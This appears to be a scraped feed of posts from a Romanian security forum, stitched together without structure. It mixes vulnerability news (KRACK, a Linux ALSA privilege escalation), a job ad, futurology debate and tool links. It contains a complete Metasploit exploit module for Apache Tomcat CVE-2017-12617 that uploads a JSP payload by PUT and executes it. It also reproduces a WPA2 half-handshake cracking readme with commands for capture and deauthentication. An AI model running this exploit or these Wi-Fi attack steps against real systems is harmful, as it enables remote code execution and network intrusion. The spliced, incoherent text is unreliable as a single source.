Leaderboard

Paper - https://papers.mathyvanhoef.com/ccs2017.pdf

Cyber Security Base with F-Secure is a free course series by University of Helsinki in collaboration with F-Secure Cyber Security Academy that focuses on building core knowledge and abilities related to the work of a cyber security professional. About the Course Series The course series consists of multiple smaller courses, each with a specific theme. Themes include a brief introduction to cyber security, operational security, web software development, types of vulnerabilities typical of web software, discovery and mitigation of such vulnerabilities, and advanced topics such as secure software architectures and cryptography. There will be several case studies as well as projects for participants. At the end of the course series, we'll also organize a friendly competition where participants get to find and fix vulnerabilities within a limited time frame. The course will launch on 31st of October, 2017. More information at: mooc.fi. The material for the last year's course is still available here. Leave us your email and we will send you updates about Cyber Security Base with F‑Secure https://cybersecuritybase.github.io/

Salut, Cautam un Junior Penetration Tester/Ethical Hacker pentru a se alatura echipei noastre in Bucuresti. Daca vreti sa lucrati in echipa cu 3 membri RST ( @TheTime, @dancezar si eu), trimiteti-mi CV-ul prin PM. Pentru alte detalii (non-confidentiale) astept PM. Un profil oficial (general) al job-ului ar fi urmatorul: Job Brief We are looking for a Junior Penetration Tester to join our Penetration Testing team and work in our Lab in Bucharest. Responsibilities • Identify security vulnerabilities in web applications (e.g. Internet Banking web applications, e-commerce websites, web portals) • Conduct internal network penetration testing - simulate a malicious individual (e.g. guest, temporary personnel) who already has access to our client's internal network of our client. Starting only from a simple network port access, you should gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags • Perform mobile application penetration tests on Android, iOS, or Windows applications • Exploit the identified vulnerabilities and identify specific, meaningful risk to clients based on industry and business focus • Write comprehensive reports including assessment-based findings, outcomes and recommendations for further security enhancement Requirements • Experience in identifying and reporting security vulnerabilities • Familiarity with web related technologies (Web applications, Web Services) and of network/web related protocols • Detailed technical knowledge of at least one of: software security, operating systems security, network security • Understanding of the latest security principles, techniques and protocols • Should have excellent English written and verbal skills • Bachelor’s degree in Computer Science or related field • Problem solving skills and ability to work under pressure • Should be able to work individually or as member of a team Benefits • Attractive salary package, including meal tickets and health insurance • Work with like-minded, driven and smart team members • Encouraged to perform research and participate at security conferences • Work flexibility • Private, dedicated workspace for security related projects

Security researchers have discovered a new privilege-escalation vulnerability in Linux kernel that could allow a local attacker to execute code on the affected systems with elevated privileges. Discovered by Venustech ADLab (Active-Defense Lab) researchers, the Linux kernel vulnerability (CVE-2017-15265) is due to a use-after-free memory error in the Advanced Linux Sound Architecture (ALSA) sequencer interface of the affected application. The Advanced Linux Sound Architecture (ALSA) provides audio and MIDI functionality to the Linux operating system, and also bundles a userspace driven library for application developers, enabling direct (kernel) interaction with sound devices through ALSA libraries. Successful exploitation of this vulnerability requires an attacker—with local access on the targeted system—to execute a maliciously crafted application on a targeted system, which allows the attacker to elevate his privilege to root on the targeted system, a Cisco advisory warned. The vulnerability affects major distributions of the Linux operating system including RedHat, Debian, Ubuntu, and Suse, and is triggered by a slip in snd_seq_create_port(). The vulnerability has been patched in Linux kernel version 4.13.4-2, which was fixed just by taking the refcount properly at "snd_seq_create_port()" and letting the caller unref the object after use. Administrators are advised to apply the appropriate updates on their Linux distributions as soon as they receive them from their respective distro. They're also recommended to allow only trusted users to access local systems and always monitor affected systems. This flaw is yet another privilege escalation vulnerability recently uncovered in the Linux kernel. Last month, a high-risk 2-year-old potential local privilege escalation flaw was patched in the Linux kernel that affected all major Linux distributions, including Red Hat, Debian, and CentOS. In February, another privilege-escalation vulnerability that dates back to 2011 disclosed and patched in the Linux kernel which also affected major Linux distro, including Redhat, Debian, OpenSUSE, and Ubuntu. Via thehackernews.com

E bine sa visezi dar cu cap. Cine stie ce a fumat omul... inainte sa scoata pe gura lucrurile alea. Daca avea atata incredere in tehnologie nu se apucau sa falsifice emisiile de carbon la milioane de masini ca sa jupeasca multe milioane euro. Poate ca din "ivory tower"-ul lui lucrurile par mai aproape de realitate dar nu a apucat sa traiasca o viata de rand sa vada in ce stare e infrastructura unei tari, sa vada cat de multi oameni depind de food banks si ajutoare sociale, de ceea ce sunt in stare unii "oameni" sa faca altora, etc. Cu alte cuvinte sa vada mizeria umana in cele mai depravate si ascunse unghiuri. Cat despre.. Babuinland multi inca se caca in fundul curtii si beau spirt Mona tras prin paine. A se adauga +500 ani la orice estimare de ani.

eful Daimler AG prezice viitorul lumii. În particular, din 2020 va începe falimentul industriei auto 25.07.2017 Dieter Zetsche, director general al Daimler AG, corporaţie care deţine marca Mercedes-Benz, şi-a exprimat previziunile sale într-un blitz interviu pe reţeaua de socializare LinkedIn, în ce priveşte viitorul acestei lumi. Cel mai uimitor lucru pe care l-am aflat din una dintre declaraţiile sale este că industria auto va falimenta în scurt timp, asta pentru că nimeni nu va mai avea nevoie să-şi cumpere o maşină! Dieter Zetsche, CEO of Daimler and Head of Mercedes-Benz, attends a news conference in front of a Mercedes EQ Electric car on media day at the Mondial de l’Automobile, the Paris auto show, in Paris, France, September 29, 2016. REUTERS/Jacky Naegelen Iată toate prezicerile făcute de Dieter Zetsche. Urmează să vedem dacă vor deveni realitate: Software-ul (sisteme şi limbaje de programare) va distruge industria tradiţională în 5-10 ani; Deşi Uber e un soft, acum e cea mai mare companie de taxi din lume. La fel, Airbnb e cea mai mare companie hotelieră deşi nu deţine nicio proprietate; FOTO: ztb.kz Despre inteligenţa artificială: anul acesta, un calculator a bătut la jocul „Go” (un joc de masă inventat în China antică) cel mai bun jucător din lume. Era de aşteptat să se întâmple, dar abia peste vreo 10 ani; În SUA, avocaţii tineri nu mai au job-uri. Soft-urile, precum IBM Watson, îţi dau sfaturi legale în câteva secunde, cu o acurateţe de 90%, versus 70% cât îţi dau oamenii; Dacă planifici sau studiezi deja Dreptul la universitate, opreşteşte! În viitorul care bate la uşă vor fi cu 90% mai puţini avocaţi sau specialişti în drept; Acelaşi software IBM Watson reuşeşte în prezent să pună diagnosticul de cancer cu o precizie de patru ori mai mare decât oamenii, iar Facebook are un soft de recunoaştere facială mai bun decât avem noi, nativ. Până în 2030, calculatoarele vor fi superioare oamenilor; YORKTOWN HEIGHTS, NEW YORKIBM has created a computer, called Watson, that will play against the best Jeopardy contestants for three nights, Feb. 14, 15, and 16. The host of Jeopardy, Alex Trebek, rehearses for the upcoming show. (Photo by Carolyn Cole/Los Angeles Times via Getty Images) Automobilele autonome: Primele astfel de maşini, care vor fi capabile să se deplaseze fără intervenţia şoferului, vor apărea din 2018. Din 2020 industria constructoare de maşini se va schimba şi va începe să falimenteze treptat. Nu vei mai avea nevoie de o maşină personală. Tu şi copiii tăi vor putea chema o maşină printr-o aplicaţie mobilă. Maşina va fi fără şofer, tu vei plăti doar şi ea te va duce la destinaţie. În concluzie: nimeni nu va mai avea maşini-proprietate, însă toţi vom avea acces la ele; Lucrul menţionat anterior va transforma oraşele, pentru că parcările vor constitui doar 5% din suprafaţa acestora. 90-95% din „fostele” terenuri de parcare vor deveni parcuri de joacă; Potrivit statisticilor, anual îşi pierd viaţa 1.2 milioane de oameni în accidente rutiere, câte un om la 100.000 de kilometri. Maşinile autonome vor salva anual vieţile a un milion de oameni, iar rata mortalităţii va fi de un om la 10 milioane de kilometri; FOTO: sub5zero.com Companiile producătoare de maşini tradiţionale din prezent, o mare parte din ele, practic vor înceta să mai existe. Altele, precum Tesla, Google şi Apple vor revoluţiona industria auto, construind nişte calculatoare inteligente pe roţi; În prezent ştiu o mulţime de ingineri de la Volkswagen şi Audi care sunt îngroziţi de Tesla şi de posibilităţile pe care le are; Odată cu apariţia automobilelor autonome asigurările auto vor deveni iniţial de 100 de ori mai ieftine, iar ulterior această afacere va dispărea complet, asta pentru că va exista comunicare între maşini, fapt care va duce la prevenirea accidentelor rutiere; FOTO: bgr.com Vor dispărea şi agenţiile imobiliare. Nimeni nu îşi va mai cumpăra o locuinţă pentru că toţi vor locui în spaţii închiriate, şi asta pentru că se va putea munci în timpul călătoriilor şi astfel oamenii vor căuta mereu un loc mult mai frumos; Oraşele vor fi silenţioase pentru că vor fi maşini electrice. Respectiv vor fi mai curate şi va fi mai uşor de locuit în ele. Energia electrică se va ieftini considerabil din cauză că nu va exista un acces limitat la energia solară. Fiecare o va putea produce individual (prin achiziționarea unor panouri solare, de exemplu); Împreună cu energia electrică se va ieftini şi apa. Desalinizarea ei are nevoie în prezent de 2 kWh şi costă 0.25 cenţi pe metru cub (medie preţ global); FOTO: amazonaws.com Tricorder X va fi anuţat şi lansat anul acesta, un mecanism digital similar atât prin denumire, cât şi prin funcţionalitate unuia din filmele Star Trek. El va analiza prin smartphone retina, o mostră de sânge şi respiraţia. Astfel se vor face analizele, mult mai ieftin, mai rapid şi cu o precizie maximă. Respectiv, în câţiva ani va dispărea o parte însemnată a sistemului medical (recoltare şi interpretare analize); Imprimantele 3D vor revoluţiona lumea: Peste 10 ani fiecare îşi va putea permite una, cea mai ieftină şi calitativă costând 400 de dolari. Acestea vor lucra şi de 100 de ori mai rapid. Imaginaţi-vă că la sfârşitul acestui an apar telefoane cu funcţie de scanare 3D. Astfel, vă veţi putea scana picioarele şi respectiv vă veţi putea scoate la imprimantă încălţămintea dorită. În prezent în China există deja suprafeţe imobiliare imprimate 3D, iar unele companii produc cu imprimanta 3D piese pentru avioane. Până în 2027, 10% din tot ce se va produce va fi imprimat 3D; Dacă aveţi în prezent idei de business, nu le începeţi dacă nu funcţionează în acord şi relaţie cu smartphone-ul. De asemenea, ideile de afaceri care au avut succes în secolul XX, nu îl vor mai avea în secolul XXI; 70-80% din job-urile actuale vor dispărea în următorii 20 de ani. Vor apărea altele noi, dar nu se cunoaşte dacă vor fi suficiente; Vom avea în viitor fermieri-roboţi la 100 de dolari bucata. Vor munci în locul nostru, iar acest lucru va revoluţiona agricultura mai ales în ţările din lumea a 3-a (gen cele din Africa); Aeroponica, cultivarea plantelor fără sol şi practic „în aer”, se va dezvolta foarte mult. De asemenea, pe piaţă vor fi aduse produse alternative care vor conţine mai multe proteine decât carnea obişnuită, cei drept, făcute din insecte; A Bosch employee controls a deep field robot called „BoniRob” at a field in Renningen near Stuttgart, Germany July 29, 2016. REUTERS/Michaela Rehle – RTSL1NO Până în 2020 vor exista aplicaţii care vor detecta dacă minţim sau vrem să înşelăm pe cineva. Doar imaginaţi-vă cum va afecta asta campaniile electorale de exemplu; Moneda electronică, bictoin-ul, ar putea deveni monedă internaţională! Până în 2036 ar trebui să trăim în medie 100 de ani. Din prezent, în fiecare an, durata medie de viaţă creşte cu 3 luni; În 2020, 70% din oameni vor avea câte smartphone, respectiv acces la educaţie de calitate. În Africa şi în Asia se vând deja telefoane cu 10 dolari bucata. În viitor toţi copii din lume vor avea acces la învăţământ superior şi practic gratuit. FOTO: psm7.com Sursa: http://autoblog.md/seful-daimler-ag-prezice-viitorul-lumii-particular-din-2020-va-incepe-falimentul-industriei-auto/ Poate e de la prea multa cafea, dar mie articolul mi-a dat de gandit.

Nici viitorul nu mai e ce-o fost

Cred ca, teoretic, daca AI s-ar dezvolta suficient, multe pozitii IT s-ar putea inlocui. La inceput, o sa fie AI care face "munca de jos", si noi sa ne batem capul doar cu concepte mai high-level (pana ajunge si AI-ul acolo, and then repeat). Totusi, poate(sper) o sa fie schimbari pozitive per total, poate o mai scoata lumea din "rat race" si oamenii o sa aiba timp sa fie mai mult oameni, si mai putin sclavi moderni, ceea ce s-ar putea sa si imbunatateasca relatiile dintre oameni. Sunt multi oameni care nu fac deloc ceva ce le place, pt ca isi consuma aproape tot timpul cu un job care ii ajuta doar sa supravietuiasca, si asta contribuie la multe lucruri negative. Dar o posibila parte negativa e ca daca ai tehnologie care face aproape totul pentru tine ca om, multi nu o sa isi mai exerseze abilitatile cognitive prea mult, ducand astfel la o scadere a inteligentei (am ajuns la acest nivel de inteligenta ca oameni tocmai prin rezolvarea problemelor pe care le intampinam), cu alte cuvinte lumea o sa se prosteasca si mai tare, ceea ce o sa fie un punct de exploatat pentru unii. Desigur, TV-ul si internetul folosit doar pentru divertisment fac asta deja cu multe persoane, dar sper sa nu creasca prea tare numarul lor in viitor.

Si in media... http://www.independent.co.uk/life-style/gadgets-and-tech/news/krack-wifi-wpa-2-free-network-internet-device-android-ios-iphone-phone-safety-privacy-security-a8002731.html https://www.theregister.co.uk/2017/10/16/wpa2_krack_attack_security_wifi_wireless/ https://www.theguardian.com/technology/2017/oct/16/wpa2-wifi-security-vulnerable-hacking-us-government-warns https://www.forbes.com/sites/thomasbrewster/2017/10/16/krack-attack-breaks-wifi-encryption/ http://www.zdnet.com/article/wpa2-security-flaw-lets-hackers-attack-almost-any-wifi-device/ https://mspoweruser.com/krack-attack-makes-trivial-intercept-manipulate-traffic-sent-linux-android-devices/ http://www.bbc.co.uk/news/technology-41635516 https://arstechnica.com/information-technology/2017/10/severe-flaw-in-wpa2-protocol-leaves-wi-fi-traffic-open-to-eavesdropping/

Viitorul o sa fie interesant, sa speram ca mai bine. Oricum, Romania PSD va fi in continuare in Evul Mediu, deci sa nu avem mari asteptari. E important sa intelegem ca cel putin noi, cei care lucram in "IT", nu o sa ramanem fara locuri de munca.

The Worldpay Payments & IoT Hackathon taking place this November 3-5 in Bucharest at the Impact Hub. Participants will receive training on IoT and Worldpay technologies! I can’t forget to mention the prizepool worth 13,500 Lei will be awarded among the winning teams! Here is the media kit

Subestimezi instinctul de supravietuire al bacteriilor/parazitiilor. Isi gasesc intotdeauna o gazda de care sa se lipeasca si pe spatele careia sa se inmulteasca. Insa sunt si ei oarecum necesari pentru evolutia speciei (mai putin unii de misuna pe aici pe forum )

Clubul de la Roma publica in 1991: “In searching for a common enemy against whom we can unite, we came up with the idea that pollution, the threat of global warming, water shortages, famine and the like, would fit the bill. In their totality and their interactions these phenomena do constitute a common threat which must be confronted by everyone together. But in designating these dangers as the enemy, we fall into the trap, which we have already warned readers about, namely mistaking symptoms for causes. All these dangers are caused by human intervention in natural processes, and it is only through changed attitudes and behaviour that they can be overcome. The real enemy then is humanity itself.” prelua teze mai vechi, seful Daimler AG reimpacheteaza "comercial" aceleasi obsesii, cit sa faca digerabila decizia ce ni se va impune. ii incomodam, sintem prea numerosi, inutili si periculosi pentru ei.

Vulnerability Note VU#228519 Wi-Fi Protected Access II (WPA2) handshake traffic can be manipulated to induce nonce and session key reuse. Vendor Information for VU#228519 Wi-Fi Protected Access II (WPA2) handshake traffic can be manipulated to induce nonce and session key reuse.

<removed>

Mai sunt si alti membri RST, doar ca se pastreaza "underground".

Si eu mi-am adus aminte de propaganda ceausista

Tot azi am mai citit ceva de genu', dar de la Elon Musca. Eu nu sunt asa entuziasmat de ce ne poate aduce viitorul asta prevazut de ei.

Si niste cifre.. (daca sunt adevarate).. inainte de fermieri roboti, masini-drona si imprimante 3D: http://www.digi24.ro/stiri/actualitate/social/10-milioane-de-romani-fara-canalizare-cand-vrem-sa-facem-baie-plecam-la-oras-763765 http://www.gandul.info/stiri/jumatate-din-populatia-romaniei-nu-are-canalizare-sau-acces-la-retele-de-epurare-a-apelor-statistici-ins-16594028

@QuoVadis mi-ai amintit de bijuteria asta

Malware cu a.i. ar fi interesant.

This Metasploit module uploads a jsp payload and executes it. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Tomcat RCE via JSP Upload Bypass', 'Description' => %q{ This module uploads a jsp payload and executes it. }, 'Author' => 'peewpw', 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2017-12617' ], [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ], [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ] ], 'Privileged' => false, 'Platform' => %w{ linux win }, # others? 'Targets' => [ [ 'Automatic', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ], [ 'Java Windows', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ], [ 'Java Linux', { 'Arch' => ARCH_JAVA, 'Platform' => 'linux' } ] ], 'DisclosureDate' => 'Oct 03 2017', 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]), Opt::RPORT(8080) ]) end def check testurl = Rex::Text::rand_text_alpha(10) testcontent = Rex::Text::rand_text_alpha(10) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"), 'method' => 'PUT', 'data' => "<% out.println(\"#{testcontent}\");%>" }) res1 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"), 'method' => 'GET' }) if res1 && res1.body.include?(testcontent) send_request_cgi( opts = { 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"), 'method' => 'DELETE' }, timeout = 1 ) return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit print_status("Uploading payload...") testurl = Rex::Text::rand_text_alpha(10) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"), 'method' => 'PUT', 'data' => payload.encoded }) if res && res.code == 201 res1 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"), 'method' => 'GET' }) if res1 && res1.code == 200 print_status("Payload executed!") else fail_with(Failure::PayloadFailed, "Failed to execute the payload") end else fail_with(Failure::UnexpectedReply, "Failed to upload the payload") end end end # 0day.today [2017-10-13] # Source: 0day.today

Synopsis: Small and highly portable detection tests mapped to the Mitre ATT&CK Framework. Link: https://github.com/redcanaryco/atomic-red-team (via https://twitter.com/redcanaryco/status/918236402814394368)

Synopsis: PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system. Link: https://github.com/ufrisk/pcileech/

Your Computer’s Hard Drive Can Be Used to Listen to What You’re Saying Link: https://blog.hackster.io/your-computers-hard-drive-can-be-used-to-listen-to-what-you-re-saying-808b83f19f80

OS X Auditor is a free Mac OS X computer forensics tool. OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze: the kernel extensions the system agents and daemons the third party's agents and daemons the old and deprecated system and third party's startup items the users' agents the users' downloaded files the installed applications It extracts: the users' quarantined files the users' Safari history, downloads, topsites, LastSession, HTML5 databases and localstore the users' Firefox cookies, downloads, formhistory, permissions, places and signons the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage the users' social and email accounts the WiFi access points the audited system has been connected to (and tries to geolocate them) It also looks for suspicious keywords in the .plist themselves. It can verify the reputation of each file on: Team Cymru's MHR VirusTotal your own local database It can aggregate all logs from the following directories into a zipball: /var/log (-> /private/var/log) /Library/logs the user's ~/Library/logs Finally, the results can be: rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep) rendered as a HTML log file sent to a Syslog server Author Jean-Philippe Teissier - @Jipe_ & al. Support OS X Auditor started as a week-end project and is now barely maintained. It has been forked by the great guys @ Yelp who created osxcollector. If you are looking for a production / corporate solution I do recommend you to move to osxcollector (https://github.com/Yelp/osxcollector) How to install Just copy all files from GitHub. Dependencies If you plan to run OS X Auditor on a Mac, you will get a full plist parsing support with the OS X Foundation through pyobjc: pip install pyobjc If you can't install pyobjc or if you plan to run OS X Auditor on another OS than Mac OS X, you may experience some troubles with the plist parsing: pip install biplist pip install plist These dependencies will be removed when a working native plist module will be available in python How to run OS X Auditor runs well with python >= 2.7.2 (2.7.9 is OK). It does not run with a different version of python yet (due to the plist nightmare) OS X Auditor is maintained to work on the lastest OS X version. It will do its best on older OS X versions. You must run it as root (or via sudo) if you want to use is on a running system, otherwise it won't be able to access some system and other users' files If you're using API keys from environment variables (see below), you need to use the sudo -E to use the users environment variables Type osxauditor.py -h to get all the available options, then run it with the selected options eg. [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html Setting Environment Variables VirusTotal API: export VT_API_KEY=aaaabbbbccccddddeeee Changelog Download: OSXAuditor-master.zip or git clone https://github.com/jipegit/OSXAuditor.git Source: https://github.com/jipegit/OSXAuditor

Hacking Soft Tokens Advanced Reverse Engineering on Android Bernhard Mueller © 2016 Vantage Point Security Pte. Ltd. Table of Contents Introduction............................................................................................................................................................... 5 Mobile One-Time Password Token Overview.................................................................................................... 6 OATH TOTP..................................................................................................................................................................................6 Proprietary Algorithms...................................................................................................................................................................7 Provisioning......................................................................................................................................................................................7 Attacks...............................................................................................................................................................................................8 Retrieval from Memory..............................................................................................................................................................9 Code Lifting and Instrumentation ...........................................................................................................................................9 The Android Reverser’s Toolbox......................................................................................................................... 10 De-Compilers, Disassemblers and Debuggers.....................................................................................................................10 Tracing Java Code.....................................................................................................................................................................11 Tracing Native Code ................................................................................................................................................................15 Tracing System Calls.................................................................................................................................................................17 Classic Linux Rootkit Style......................................................................................................................................................19 Dynamic Analysis Frameworks..............................................................................................................................................19 Drawbacks Emulation-based Analysis ..................................................................................................................................21 Hacking Soft Tokens - Bernhard Mueller © 2016 Vantage Point Security Pte. 4 of 68 Runtime Instrumentation with Frida .....................................................................................................................................22 Building A Sandbox................................................................................................................................................ 23 Sandbox Overview....................................................................................................................................................................24 Customizing the Kernel...........................................................................................................................................................25 Customizing the RAMDisk.....................................................................................................................................................26 Booting the Environment .......................................................................................................................................................28 Customizing ART.....................................................................................................................................................................29 Hooking System Calls ..............................................................................................................................................................31 Automating System Call Hooking with Zork.......................................................................................................................35 Case Studies ............................................................................................................................................................. 36 RSA SecurID: ProGuard and a Proprietary Algorithm...........................................................................................................37 Analyzing ProGuard-processed Bytecode ............................................................................................................................37 Data Storage and Runtime Encryption .................................................................................................................................39 Tool Time: RSACloneId..........................................................................................................................................................41 Vendor Response......................................................................................................................................................................44 Summary.....................................................................................................................................................................................45 Vasco DIGIPASS: Advanced Anti-Tampering........................................................................................................................47 Initial Analysis ...........................................................................................................................................................................47 Root Detection and Integrity Checks....................................................................................................................................51 Native Debugging Defenses ...................................................................................................................................................54 JDWP Debugging Defenses....................................................................................................................................................56 Static-dynamic Analysis............................................................................................................................................................58 Attack Outline ...........................................................................................................................................................................59 Tool Time: VasClone....................................................................................................................................................................60 Vendor Comments........................................................................................................................................................................64 Summary.....................................................................................................................................................................................65 TL; DR...................................................................................................................................................................... 66 Attack Mitigation...........................................................................................................................................................................66 Software Protection Effectiveness..............................................................................................................................................66 REFERENCES....................................................................................................................................................... 67 Download: http://gsec.hitb.org/materials/sg2016/whitepapers/Hacking Soft Tokens - Bernhard Mueller.pdf

WPA2-HalfHandshake-Crack Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client withen range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake. For more information on general wifi hacking, see here Install $ sudo python setup.py install Sample use $ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1" -r Where to read input pcap file with half handshake (works with full handshakes too) -m AP mac address (From the 'fake' access point that was used during the capture) -s AP SSID -d (optional) Where to read dictionary from Capturing half handshakes To listen for device probes the aircrack suite can be used as follows sudo airmon-ng start wlan0 sudo airodump-ng mon0 You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted Setup a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything In ubuntu this can be done here http://ubuntuhandbook.org/index.php/2014/09/3-ways-create-wifi-hotspot-ubuntu/ Capture traffic on this interface. In linux this can be achived with TCPdump sudo tcpdump -i wlan0 -s 65535 -w file.cap (optional) Deauthenticate clients from nearby WiFi networks to increase probes If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks http://www.aircrack-ng.org/doku.php?id=deauthentication Sursa: https://github.com/dxa4481/WPA2-HalfHandshake-Crack

Cel mai tare ma amuza comentarile unora, care dupa parearea mea ori sunt prea batrani si comunismul nu a iesit din ei ori sunt prea incuiati. Baaaa viitorul nu se limiteaza la granita Romaniei terminati dracu cu mentalitatea aia de cacat.Voi credeti ca de aia nu o sa evolueze lumea, din cauza romanilor care se caca in fundul curtii?! Va inselati!